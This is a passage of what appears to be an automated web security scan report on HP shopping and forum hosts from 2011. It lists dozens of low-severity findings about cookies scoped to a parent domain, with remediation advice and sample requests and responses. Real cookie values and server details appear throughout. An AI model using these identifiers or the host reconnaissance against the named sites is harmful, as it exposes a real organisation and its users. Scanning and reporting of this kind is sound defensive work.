http://www.shopping.hp.com/webapp/shopping/offers_guide.do
http://www.shopping.hp.com/webapp/shopping/print_supp_acc_landing.do
http://www.shopping.hp.com/webapp/shopping/questions.do
http://www.shopping.hp.com/webapp/shopping/return_exchange.do
http://www.shopping.hp.com/webapp/shopping/sale_guide.do
http://www.shopping.hp.com/webapp/shopping/search_request.do
http://www.shopping.hp.com/webapp/shopping/series_can.do
http://www.shopping.hp.com/webapp/shopping/store_access.do
http://www.shopping.hp.com/webapp/shopping/supplies_category.do
http://www.shopping.hp.com/webapp/shopping/terms.do
http://www.shopping.hp.com/webapp/shopping/topRatedLanding.do

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

8.1. https://h30046.www3.hp.com/subchoice/country/us/en/subhub.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://h30046.www3.hp.com
Path:	/subchoice/country/us/en/subhub.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SMIDENTITY=/3VZN3FtH+hlxGfJLqNFLtagi6gf4FQoPwe2XUIZ2qMfXsZjQRUGqjyKzn3qMcESI99852jNsmZKF8N0Bg4VVhJuRUXPHO+xRK9aQ95vt+5C6GZfX68EdPpeHTOXGtLW0hgmqU4j4eaivBMX2/to2rV7xy+3kTQDin/+NcNlgpSP+rsiPN7uUr1wzRceIshLNO96vteYGXP4F715O95s2m1V8t7jd9tOh/7ICKScDH2l9uNs3fBlMPaBJsyqYYZ6lf7hLd8Ya7WDtahDcQ22hkjwob61vRK+0/q/HUTdSnkKHzoFjRI0hJPBnvw5M87ko0XgWn5deTuTIkSLcAb9jFTCVS6BtuYpJgKCJtFHs8moRxGKDOoNUZUk1OTB2tgBK+QHzbrlSN4QQElS4lQ0bLoqCcWIGSxPHddJkwN0PARJ9O0troqmfLlz7r3lUFPW32wth48xu3sV1rh/fNm7vQMZDcrsydoyK4QwHQ616ZAcbgAKS9ra3uAZytb44gk+CZmGBJ3nTfPbtkYUg08oUfyI/lTuugHuTMd3k9a6L099jZQax5nHSds660rhmJhK; path=/; domain=.hp.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /subchoice/country/us/en/subhub.aspx HTTP/1.1
Host: h30046.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.2. http://h30499.www3.hp.com/t5/Community-Feedback-&-Suggestions/bd-p/community-feedback-suggestions previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h30499.www3.hp.com
Path:	/t5/Community-Feedback-&-Suggestions/bd-p/community-feedback-suggestions

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

VISITORID=452137428; Domain=.www3.hp.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.3. http://h30499.www3.hp.com/t5/Fortify-Software-Security-Center-Discussion/bd-p/sws-Fortifyforum previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h30499.www3.hp.com
Path:	/t5/Fortify-Software-Security-Center-Discussion/bd-p/sws-Fortifyforum

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

VISITORID=1940924259; Domain=.www3.hp.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.4. http://h30499.www3.hp.com/t5/ITRC-Business-Availability-Center-Forum/bd-p/itrc-875 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h30499.www3.hp.com
Path:	/t5/ITRC-Business-Availability-Center-Forum/bd-p/itrc-875

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

VISITORID=2092928694; Domain=.www3.hp.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.5. http://h30507.www3.hp.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h30507.www3.hp.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

VISITORID=1007929229; Domain=.www3.hp.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: h30507.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.6. http://www.shopping.hp.com/accessories-store/computer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/accessories-store/computer

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:36 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accessories-store/computer HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.7. http://www.shopping.hp.com/accessories-store/handheld previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/accessories-store/handheld

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:40 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accessories-store/handheld HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.8. http://www.shopping.hp.com/accessories-store/printer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/accessories-store/printer

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:38 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accessories-store/printer HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.9. http://www.shopping.hp.com/accessories-store/scanner previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/accessories-store/scanner

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:41 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accessories-store/scanner HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:40 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlktjd6S3Qp4MiDvslTbcwLTng%3D%3D; expires=Friday, 28-Oct-2011 12:15:41 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:41 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<style type="text/css">
.NewMpss{float
...[SNIP]...

8.10. http://www.shopping.hp.com/accessories-store/touchpad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/accessories-store/touchpad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:39 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accessories-store/touchpad HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.11. http://www.shopping.hp.com/can/computer/categories/ac_adapters/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/ac_adapters/1/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:49 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.12. http://www.shopping.hp.com/can/computer/categories/ac_adapters/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/ac_adapters/2/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:48 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.13. http://www.shopping.hp.com/can/computer/categories/carrying_cases/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/carrying_cases/1/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:52 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:51 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkui9uQ3A99MyzsvlPZcQGc0ic%3D; expires=Friday, 28-Oct-2011 12:15:52 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:52 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

8.14. http://www.shopping.hp.com/can/computer/categories/carrying_cases/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/carrying_cases/2/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.15. http://www.shopping.hp.com/can/computer/categories/digital_cameras/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/digital_cameras/1/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:45 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.16. http://www.shopping.hp.com/can/computer/categories/digital_cameras/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/digital_cameras/2/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:52 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.17. http://www.shopping.hp.com/can/computer/categories/docking_solutions/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/docking_solutions/1/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:54 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.18. http://www.shopping.hp.com/can/computer/categories/docking_solutions/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/docking_solutions/2/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:53 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:52 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlktgt%2BR3glwMSvpulbbdwWW0ic%3D; expires=Friday, 28-Oct-2011 12:15:53 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:53 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

8.19. http://www.shopping.hp.com/can/computer/categories/home_theater_audio/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/home_theater_audio/1/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:18:22 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.20. http://www.shopping.hp.com/can/computer/categories/home_theater_audio/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/home_theater_audio/2/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:19:03 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.21. http://www.shopping.hp.com/can/computer/categories/memory/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/memory/1/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /can/computer/categories/memory/1/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.22. http://www.shopping.hp.com/can/computer/categories/memory/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/memory/2/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:59 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /can/computer/categories/memory/2/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.23. http://www.shopping.hp.com/can/computer/categories/mice_keyboards/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/mice_keyboards/1/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:01 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.24. http://www.shopping.hp.com/can/computer/categories/mice_keyboards/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/mice_keyboards/2/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:03 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.25. http://www.shopping.hp.com/can/computer/categories/music_devices/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/music_devices/1/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:18:06 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.26. http://www.shopping.hp.com/can/computer/categories/music_devices/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/music_devices/2/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:18:10 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.27. http://www.shopping.hp.com/can/computer/categories/networking/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/networking/1/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:56 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.28. http://www.shopping.hp.com/can/computer/categories/networking/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/networking/2/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:54 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:54 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkuj9mR2wx%2FMSvivVTdeQGc0ic%3D; expires=Friday, 28-Oct-2011 12:15:54 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:54 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

8.29. http://www.shopping.hp.com/can/computer/categories/notebook_batteries/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/notebook_batteries/1/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:47 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.30. http://www.shopping.hp.com/can/computer/categories/notebook_batteries/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/notebook_batteries/2/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:47 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:47 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkjjNuQ0Ap5MCzuvFLedwCc0ic%3D; expires=Friday, 28-Oct-2011 12:15:47 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:47 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

8.31. http://www.shopping.hp.com/can/computer/categories/photo_frames/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/photo_frames/1/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:58 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.32. http://www.shopping.hp.com/can/computer/categories/photo_frames/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/photo_frames/2/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:17:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.33. http://www.shopping.hp.com/can/computer/categories/projector_accessories/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/projector_accessories/1/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:17:38 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.34. http://www.shopping.hp.com/can/computer/categories/projector_accessories/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/projector_accessories/2/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:17:48 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.35. http://www.shopping.hp.com/can/computer/categories/security_systems/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/security_systems/2/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:17:34 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.36. http://www.shopping.hp.com/can/computer/categories/software/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/software/1/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:44 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /can/computer/categories/software/1/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.37. http://www.shopping.hp.com/can/computer/categories/software/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/software/2/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:45 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /can/computer/categories/software/2/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.38. http://www.shopping.hp.com/can/computer/categories/speakers_headsets/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/speakers_headsets/1/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:15 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.39. http://www.shopping.hp.com/can/computer/categories/speakers_headsets/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/speakers_headsets/2/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:10 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.40. http://www.shopping.hp.com/can/computer/categories/storage_solutions/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/storage_solutions/1/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:42 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.41. http://www.shopping.hp.com/can/computer/categories/storage_solutions/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/storage_solutions/2/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:43 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.42. http://www.shopping.hp.com/can/computer/categories/tvs/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/tvs/1/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:28 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /can/computer/categories/tvs/1/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.43. http://www.shopping.hp.com/can/computer/categories/tvs/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/tvs/2/accessories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:35 GMT; path=/

